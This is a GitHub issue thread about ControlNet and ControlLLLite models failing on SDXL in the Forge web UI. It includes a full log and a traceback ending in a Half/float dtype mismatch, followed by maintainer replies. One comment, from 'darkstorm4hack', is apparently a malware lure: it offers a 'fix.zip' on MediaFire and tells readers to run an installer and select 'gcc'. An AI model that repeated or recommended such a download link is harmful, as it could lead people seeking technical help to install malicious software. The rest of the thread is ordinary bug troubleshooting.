### ISSUE TITLE
Controlnet CNET and CLite models are completely broken on SDXL

### ISSUE THREAD

**Issue by Allwhey** [lllyasviel/stable-diffusion-webui-forge#1488]
Tested with Pony Diffusion, I used both a Controllite SDXL Canny Model and a Controlnet SDXL line art model, neither of them were able to generate. I am using the latest version of the repo.

Example of a CN Lineart Model:
`2024-08-25 01:44:15,628 - ControlNet - INFO - Preview Resolution = 1024
2024-08-25 01:44:22,350 - ControlNet - INFO - Preview Resolution = 1024
2024-08-25 01:44:24,826 - ControlNet - INFO - ControlNet Input Mode: InputMode.SIMPLE
2024-08-25 01:44:25,727 - ControlNet - INFO - Using preprocessor: lineart_standard (from white bg & black line)
2024-08-25 01:44:25,727 - ControlNet - INFO - preprocessor resolution = 1024
2024-08-25 01:44:26,031 - ControlNet - INFO - Current ControlNet ControlLLLitePatcher: U:\SD\stable-diffusion-automatic1111-webui\models\ControlNet\controlnetxlCNXL_bdsqlszLineart.safetensors
INFO:sd_dynamic_prompts.dynamic_prompting:Prompt matrix will create 8 images in a total of 1 batches.
To load target model JointTextEncoder
Begin to load 1 model
[Unload] Trying to free 5650.87 MB for cuda:0 with 0 models keep loaded ...
[Unload] Current free memory is 3839.57 MB ...
[Unload] Unload model KModel
[Memory Management] Current Free GPU Memory: 9544.89 MB
[Memory Management] Required Model Memory: 1752.98 MB
[Memory Management] Required Inference Memory: 3372.00 MB
[Memory Management] Estimated Remaining GPU Memory: 4419.91 MB
Moving model(s) has taken 6.16 seconds
[Unload] Trying to free 3372.00 MB for cuda:0 with 1 models keep loaded ...
[Unload] Current free memory is 7785.09 MB ...
136 modules
2024-08-25 01:44:33,314 - ControlNet - INFO - ControlNet Method lineart_standard (from white bg & black line) patched.
To load target model KModel
Begin to load 1 model
[Unload] Trying to free 17148.88 MB for cuda:0 with 0 models keep loaded ...
[Unload] Current free memory is 7781.50 MB ...
[Unload] Unload model JointTextEncoder
[Memory Management] Current Free GPU Memory: 9540.69 MB
[Memory Management] Required Model Memory: 4897.05 MB
[Memory Management] Required Inference Memory: 3372.00 MB
[Memory Management] Estimated Remaining GPU Memory: 1271.64 MB
Moving model(s) has taken 6.05 seconds
  0%|                                                                                           | 0/32 [00:00<?, ?it/s]
Traceback (most recent call last):
  File "U:\SD\forge-webui\webui\modules_forge\main_thread.py", line 30, in work
    self.result = self.func(*self.args, **self.kwargs)
  File "U:\SD\forge-webui\webui\modules\txt2img.py", line 112, in txt2img_function
    processed = processing.process_images(p)
  File "U:\SD\forge-webui\webui\modules\processing.py", line 818, in process_images
    res = process_images_inner(p)
  File "U:\SD\forge-webui\webui\modules\processing.py", line 961, in process_images_inner
    samples_ddim = p.sample(conditioning=p.c, unconditional_conditioning=p.uc, seeds=p.seeds, subseeds=p.subseeds, subseed_strength=p.subseed_strength, prompts=p.prompts)
  File "U:\SD\forge-webui\webui\modules\processing.py", line 1332, in sample
    samples = self.sampler.sample(self, x, conditioning, unconditional_conditioning, image_conditioning=self.txt2img_image_conditioning(x))
  File "U:\SD\forge-webui\webui\modules\sd_samplers_kdiffusion.py", line 238, in sample
    samples = self.launch_sampling(steps, lambda: self.func(self.model_wrap_cfg, x, extra_args=self.sampler_extra_args, disable=False, callback=self.callback_state, **extra_params_kwargs))
  File "U:\SD\forge-webui\webui\modules\sd_samplers_common.py", line 272, in launch_sampling
    return func()
  File "U:\SD\forge-webui\webui\modules\sd_samplers_kdiffusion.py", line 238, in <lambda>
    samples = self.launch_sampling(steps, lambda: self.func(self.model_wrap_cfg, x, extra_args=self.sampler_extra_args, disable=False, callback=self.callback_state, **extra_params_kwargs))
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\utils\_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "U:\SD\forge-webui\webui\k_diffusion\sampling.py", line 627, in sample_dpmpp_2m_sde
    denoised = model(x, sigmas[i] * s_in, **extra_args)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\webui\modules\sd_samplers_cfg_denoiser.py", line 196, in forward
    denoised, cond_pred, uncond_pred = sampling_function(self, denoiser_params=denoiser_params, cond_scale=cond_scale, cond_composition=cond_composition)
  File "U:\SD\forge-webui\webui\backend\sampling\sampling_function.py", line 362, in sampling_function
    denoised, cond_pred, uncond_pred = sampling_function_inner(model, x, timestep, uncond, cond, cond_scale, model_options, seed, return_full=True)
  File "U:\SD\forge-webui\webui\backend\sampling\sampling_function.py", line 303, in sampling_function_inner
    cond_pred, uncond_pred = calc_cond_uncond_batch(model, cond, uncond_, x, timestep, model_options)
  File "U:\SD\forge-webui\webui\backend\sampling\sampling_function.py", line 273, in calc_cond_uncond_batch
    output = model.apply_model(input_x, timestep_, **c).chunk(batch_chunks)
  File "U:\SD\forge-webui\webui\backend\modules\k_model.py", line 45, in apply_model
    model_output = self.diffusion_model(xc, t, context=context, control=control, transformer_options=transformer_options, **extra_conds).float()
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\webui\backend\nn\unet.py", line 713, in forward
    h = module(h, emb, context, transformer_options)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\webui\backend\nn\unet.py", line 83, in forward
    x = layer(x, context, transformer_options)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\webui\backend\nn\unet.py", line 321, in forward
    x = block(x, context=context[i], transformer_options=transformer_options)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\webui\backend\nn\unet.py", line 181, in forward
    return checkpoint(self._forward, (x, context, transformer_options), None, self.checkpoint)
  File "U:\SD\forge-webui\webui\backend\nn\unet.py", line 12, in checkpoint
    return f(*args)
  File "U:\SD\forge-webui\webui\backend\nn\unet.py", line 216, in _forward
    n, context_attn1, value_attn1 = p(n, context_attn1, value_attn1, extra_options)
  File "U:\SD\forge-webui\webui\extensions-builtin\sd_forge_controlllite\lib_controllllite\lib_controllllite.py", line 99, in __call__
    q = q + self.modules[module_pfx_to_q](q)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\webui\extensions-builtin\sd_forge_controlllite\lib_controllllite\lib_controllllite.py", line 213, in forward
    cx = self.conditioning1(self.cond_image.to(x.device, dtype=x.dtype))
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\container.py", line 217, in forward
    input = module(input)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\conv.py", line 460, in forward
    return self._conv_forward(input, self.weight, self.bias)
  File "U:\SD\forge-webui\system\python\lib\site-packages\torch\nn\modules\conv.py", line 456, in _conv_forward
    return F.conv2d(input, weight, bias, self.stride,
RuntimeError: Input type (struct c10::Half) and bias type (float) should be the same
Input type (struct c10::Half) and bias type (float) should be the same`

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by DenOfEquity** [comment]
controlnetxlCNXL_bdsqlszLineart.safetensors working for me with a Pony realistic merge and with a Lightning model.
Also canny, lineart, depth tested with promax controlnet - all working correctly.

**Comment by DenOfEquity** [comment]
I tried some different images resolutions up to 1024x1536, and different controlnet resolutions (512, 648 and 1024). DPM++2M SDE and then others. Also batch and single image.
Fully updated. I'm not using any command line arguments, no xformers - so your idea there might be right.

**Comment by wcole3** [comment]
Please give this a try with latest.

**Comment by wcole3** [comment]
That's interesting to hear, I did notice during testing that Pony based models did not work very well with bdsqlsz models, whereas models like Protovision worked much better.  I'd be interested to know what model you were using to investigate further.
